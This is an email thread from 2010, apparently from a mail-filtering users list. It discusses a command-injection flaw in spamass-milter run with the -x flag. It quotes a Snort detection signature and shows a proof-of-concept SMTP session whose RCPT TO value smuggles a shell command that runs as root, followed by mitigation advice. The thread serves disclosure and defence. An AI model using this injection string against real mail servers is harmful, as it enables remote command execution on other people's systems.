On Mon, 2010-03-08 at 20:16 +0000, Ned Slider wrote:
> Brian wrote:
> > On Mon, 2010-03-08 at 14:08 -0500, Michael Scheidell wrote:
> >> just a heads up: I don't know if there is a problem with SA milter, but
> >> there is a snort signature for it now.
> >>
> >>
> >> -------- Original Message --------
> >> Subject: [Emerging-Sigs] SIG: SpamAssassin Milter Plugin Remote
> >> Arbitrary Command Injection Attempt
> >> Date: Mon, 8 Mar 2010 13:03:52 +0000
> >> From: Kevin Ross <kevros...@googlemail.com>
> >> To: emerging-s...@emergingthreats.net
> >> <emerging-s...@emergingthreats.net>, Matt Jonkman <jonk...@jonkmans.com>
> >>
> >>
> >>
> >> alert tcp $EXTERNAL_NET any -> $HOME_NET 25 (msg:"ET EXPLOIT Possible
> >> SpamAssassin Milter Plugin Remote Arbitrary Command Injection Attempt";
> >> flow:established,to_server; content:"to|3A|"; nocase;
> >> content:"root+|3A|\"|7C|"; nocase; within:15; classtype:attempted-user;
> >> reference:url,www.securityfocus.com/bid/38578
> >> <http://www.securityfocus.com/bid/38578>;
> >> reference:url,seclists.org/fulldisclosure/2010/Mar/140
> >> <http://seclists.org/fulldisclosure/2010/Mar/140>; sid:1324412; rev:1;)
> >>
> >> Kev
> >>
> >
> > The key is this:
> >
> > "If spamass-milter is run with the expand flag (-x option) it runs a
> > popen() including the attacker supplied
> > recipient (RCPT TO)."
> >
> > POC IS
> >
> > $ nc localhost 25
> > 220 ownthabox ESMTP Postfix (Ubuntu)
> > mail from: me () me com
> > 250 2.1.0 Ok
> > rcpt to: root+:"|touch /tmp/foo"
> > 250 2.1.5 Ok
> >
> > $ ls -la /tmp/foo
> > -rw-r--r-- 1 root root 0 2010-03-07 19:46 /tmp/foo
> >
> >
>
> Easily mitigated, you shouldn't be accepting mail to non-FQDN addresses
>
> mail from: n...@example.com
> 250 2.1.0 Ok
> rcpt to: root+:"|touch /tmp/foo"
> 504 5.5.2 <root+:|touch /tmp/foo>: Recipient address rejected: need
> fully-qualified address
> quit
> 221 2.0.0 Bye
> Connection closed by foreign host.
>
That's a Microsoft kind of answer if you don't mind me saying. Correct
me if I'm wrong, but MILTER is (pretty much) native to Sendmail and is a
bolt-on after thought for Postfix ;-)
It is easily mitigated by *not* running it with '-x' {Happy then
**WITHOUT** Postfix}
